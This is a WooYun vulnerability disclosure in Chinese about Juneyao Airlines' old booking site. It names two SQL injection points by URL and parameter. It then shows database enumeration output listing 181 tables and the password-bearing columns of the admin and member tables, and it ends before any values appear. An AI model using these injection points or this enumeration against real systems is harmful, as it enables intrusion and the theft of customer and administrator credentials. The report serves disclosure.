WooYun.org

吉祥航空老站：http://2012b2c.juneyaoair.com/
但是数据库仍然是老库，注册了一个账号，新站，老站通用。
注入点：
http://2012b2c.juneyaoair.com/crmInterLogin.do loginPwdId=123456&loginNameId=123456 实体loginNameId需过滤
http://2012b2c.juneyaoair.com/resetPwd.do loginType=1&sendType=1&id=88952634
实体id需过滤
跑数据库：

跑当前库的表：
Database: HOFFP
[181 tables]
+--------------------------------+
| AAA |
| TBL_ADDRESS_CITY |
| TBL_AIRLINE |
| TBL_AIRLINE_CODE_SHARE |
| TBL_AIRPORT |
| TBL_BILLING_FILE_INFO |
| TBL_CARD_NUMBER_ASSIGN |
| TBL_CARD_NUMBER_CREATE_HIS |
| TBL_CHARACTER_SPELL_INDEX |
| TBL_CITY |
| TBL_CKI_INFO |
| TBL_CLASS |
| TBL_CLASS_EXCHANGE_RULE |
| TBL_CLASS_MULTIPLIER_RULE |
| TBL_CLASS_TYPE |
| TBL_COLLECT_PNR |
| TBL_COMPANY_ACCOUNT |
| TBL_COMPANY_ACCUMULATE_RULE |
| TBL_COMPANY_EXTRA_ACTIVITY |
| TBL_COMPANY_FLIGHT_ACTIVITY |
| TBL_COMPANY_INFO |
| TBL_COMPANY_MEMBER |
| TBL_COMPANY_MILES_DETAIL |
| TBL_COMPANY_MILES_EXPIRE |
| TBL_COMPANY_MILES_SPEND |
| TBL_COMPANY_PASSWORD_ALTER_HIS |
| TBL_COMPANY_REDEEM_RULE |
| TBL_COMPANY_TYPE |
| TBL_COUNTRY |
| TBL_CUSTOMER_ADDRESS |
| TBL_CUSTOMER_B2C |
| TBL_CUSTOMER_CERTIFICATE |
| TBL_CUSTOMER_CONTACT |
| TBL_CUSTOMER_INFO |
| TBL_CUSTOMER_INFO_TEMP |
| TBL_DATA_EXCHANGE_ERRCODE |
| TBL_DATA_EXCHANGE_HIS |
| TBL_EMAIL_JOB_ACCOUNT |
| TBL_EMAIL_JOB_LIST |
| TBL_ENROLLMENT_SOURCE |
| TBL_EXTRA_MILES_RULE |
| TBL_FLIGHT_ACTIVITY |
| TBL_FLIGHT_BALANCE_ACTIVITY |
| TBL_FLIGHT_CONTROL_RULE |
| TBL_FLIGHT_REDEEM |
| TBL_FLIGHT_REDEEM_DETAIL |
| TBL_FLIGHT_REDEEM_EXPENSE_RULE |
| TBL_FLIGHT_REDEEM_REJECT |
| TBL_FLIGHT_REDEEM_RULE |
| TBL_FLIGHT_REDEEM_TEMP |
| TBL_FLIGHT_REJECT_ACTIVITY |
| TBL_FLIGHT_TEMP_ACTIVITY |
| TBL_FORCE_IMPORT_APPCODE |
| TBL_INFO_CUSTOM_TYPE |
| TBL_INFO_DISTRIBUTE |
| TBL_INITIAL_REDEEM_RULE |
| TBL_INVALID_TICKET_HISTORY |
| TBL_IRREGULAR_REASON |
| TBL_JOB_MESSAGE_CONFIG |
| TBL_JOB_SETTING |
| TBL_KEYCUSTOMER_AGREEMENT |
| TBL_KEYCUSTOMER_AGREEMENT_SUB |
| TBL_KEYCUSTOMER_COUPON_HIS |
| TBL_KEYCUSTOMER_EXPAND_ASSIGN |
| TBL_KEYCUSTOMER_INFO |
| TBL_KEYCUSTOMER_NOTICE |
| TBL_KEYCUSTOMER_REDEEM |
| TBL_KEYCUSTOMER_SETTLEMENT |
| TBL_KEYCUSTOMER_TICKET_HIS |
| TBL_KEYCUSTOMER_VISIT_HIS |
| TBL_KEYCUSTOMER_VISIT_TASK |
| TBL_LOCAL_ACCRUAL_RULE |
| TBL_LOCAL_ASSIGN_GROUP |
| TBL_MEMBER_ACTIVITY_DETAIL |
| TBL_MEMBER_ACTIVITY_SPEND |
| TBL_MEMBER_BENEFIC_CHANGE_HIS |
| TBL_MEMBER_BENEFIC_INFO |
| TBL_MEMBER_BENEFIC_RULE |
| TBL_MEMBER_CARD |
| TBL_MEMBER_CARD_STATUS |
| TBL_MEMBER_CURRENT_ACCOUNT |
| TBL_MEMBER_EXTRA_ACTIVITY |
| TBL_MEMBER_FULFILLMENT_HISTORY |
| TBL_MEMBER_FULFILMENT_FILE_HIS |
| TBL_MEMBER_GROUP_CODE |
| TBL_MEMBER_GROUP_HISTORY |
| TBL_MEMBER_ID_MERGE_HIS |
| TBL_MEMBER_ID_USAGE |
| TBL_MEMBER_INFO |
| TBL_MEMBER_INFO_CHANGE_HISTORY |
| TBL_MEMBER_LEVEL |
| TBL_MEMBER_LEVEL_CHANGE_HIS |
| TBL_MEMBER_LEVEL_UPGRADE_RULE |
| TBL_MEMBER_MILEAGE_ACCOUNT |
| TBL_MEMBER_MILEAGE_ADJUST |
| TBL_MEMBER_MILEAGE_EXPIRE |
| TBL_MEMBER_PASSWORD |
| TBL_MEMBER_PASSWORD_ALTER_HIS |
| TBL_MEMBER_PROMOTION_ACTIVITY |
| TBL_MEMBER_PROMOTION_TRACE |
| TBL_MEMBER_REFULFILLMENT_HIS |
| TBL_MEMBER_RELATION_ASSIGN |
| TBL_MEMBER_SERVICE_RECORD |
| TBL_MEMBER_STATUS |
| TBL_MEMBER_STATUS_CHANGE_HIS |
| TBL_MEMBER_SUPPLIER_INFO |
| TBL_MEMBER_VERIFYCODE |
| TBL_MEMBER_WEB_LOGON_HISTORY |
| TBL_MESSAGE_CONFIG |
| TBL_MILEAGE_PURCHASE |
| TBL_MILEAGE_PURCHASE_REJECT |
| TBL_MILEAGE_PURCHASE_RULE |
| TBL_MILEAGE_PURCHASE_TEMP |
| TBL_MILEAGE_VERIFY |
| TBL_MW_CLIENT_INFO |
| TBL_MW_LOG |
| TBL_NETPAY_ORDER_HISTORY |
| TBL_NETPAY_ORDER_MANUAL_HIS |
| TBL_NOTE |
| TBL_NOTE_TYPE |
| TBL_NOTFLIGHT_REDEEM_RULE |
| TBL_NOT_FLIGHT_ACTIVITY |
| TBL_NOT_FLIGHT_REDEEM |
| TBL_NOT_FLIGHT_REDEEM_REJECT |
| TBL_NOT_FLIGHT_REDEEM_TEMP |
| TBL_PARAMETERS |
| TBL_PARAMETERS_TYPE |
| TBL_PROGRAM_COUNTRY |
| TBL_PROMOTION_CHILD_RULE |
| TBL_PROMOTION_FLIGHT_RULE |
| TBL_PROMOTION_MASTER_RULE |
| TBL_PROMOTION_NOT_FLIGHT_RULE |
| TBL_PROMOTION_VIP_RULE |
| TBL_PROVINCE |
| TBL_PURCHASE_TICKET |
| TBL_QUALIFICATION_REASON |
| TBL_REDEEM_CONTROL_RULE |
| TBL_REDEEM_QUANTITY_RULE |
| TBL_REDEEM_SPECIAL_RULE |
| TBL_ROLES |
| TBL_ROLES_RIGHTS |
| TBL_SALUTATION |
| TBL_SEGMENT_CONTROL_RULE |
| TBL_SEGMENT_MILEAGE |
| TBL_SENDING_SOURCE |
| TBL_SERVICE_CUSTOM_CONFIG |
| TBL_SMS_SEND_HISTORY |
| TBL_SMS_TYPE |
| TBL_SPECIAL_CLASS_RULE |
| TBL_SPECIAL_PROMOTION_RULE |
| TBL_STATEMENT_CONTENT |
| TBL_STATEMENT_DETAIL |
| TBL_STATEMENT_INFO |
| TBL_STATEMENT_SEND_HISTORY |
| TBL_STATIC_MEMBER_GROUP |
| TBL_SUPPLIER |
| TBL_SUPPLIER_ACCRUAL_RULE |
| TBL_SUPPLIER_ASSIGN_GROUP |
| TBL_SUPPLIER_BALANCE |
| TBL_SUPPLIER_BILLINGFILE_HIS |
| TBL_SUPPLIER_CLASS_RULE |
| TBL_SUPPLIER_DATAEXP_SEQNO |
| TBL_SUPPLIER_FLIGHT_ACTIVITY |
| TBL_SUPPLIER_FLIGHT_BALANCE |
| TBL_SUPPLIER_GROUP |
| TBL_SUPPLIER_PRODUCT |
| TBL_SUPPLIER_PRODUCT_TYPE |
| TBL_SUPPLIER_PROTOCOL_CONFIG |
| TBL_SUPPLIER_TEMPLATE_CONFIG |
| TBL_SUPPRETRO_REGISTER |
| TBL_SUPP_MIN_MILES_RULE |
| TBL_SYSTEM_FUNCTION_MANAGER |
| TBL_SYSTEM_LOG |
| TBL_SYSTEM_PARAMETER |
| TBL_UNITED_CARD_COMPANY |
| TBL_USERS |
| TBL_USER_ROLES |
| TBL_VIRTUAL_TICKETNO_RULE |
| TEMP1 |
| TEMP2 |
| UPGRADE_CABIN_INFO |
+--------------------------------+
跑users表，猜测应该是管理表：
Table: TBL_USERS
[10 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| COMMENTS | VARCHAR2 |
| DEPARTMENT_CODE | VARCHAR2 |
| OPERATE_DATE | DATE |
| OPERATE_USER_ID | VARCHAR2 |
| STATUS | VARCHAR2 |
| UPDATE_DATE | DATE |
| UPDATE_USER_ID | VARCHAR2 |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_PASSWORD | VARCHAR2 |
+-----------------+----------+
160多个后台用户：

跑member信息：
Database: HOFFP
Table: TBL_MEMBER_PASSWORD
[12 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| B2C_PASSWORD | VARCHAR2 |
| COMMENTS | VARCHAR2 |
| ID | NUMBER |
| MEMBER_ID | VARCHAR2 |
| OPERATE_DATE | DATE |
| OPERATE_USER_ID | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PSW_STATUS | VARCHAR2 |
| RESET_ANSWER | VARCHAR2 |
| RESET_QUESTION | VARCHAR2 |
| UPDATE_DATE | DATE |
| UPDATE_USER_ID | VARCHAR2 |
+-----------------+----------+
用户登录账号口令信息：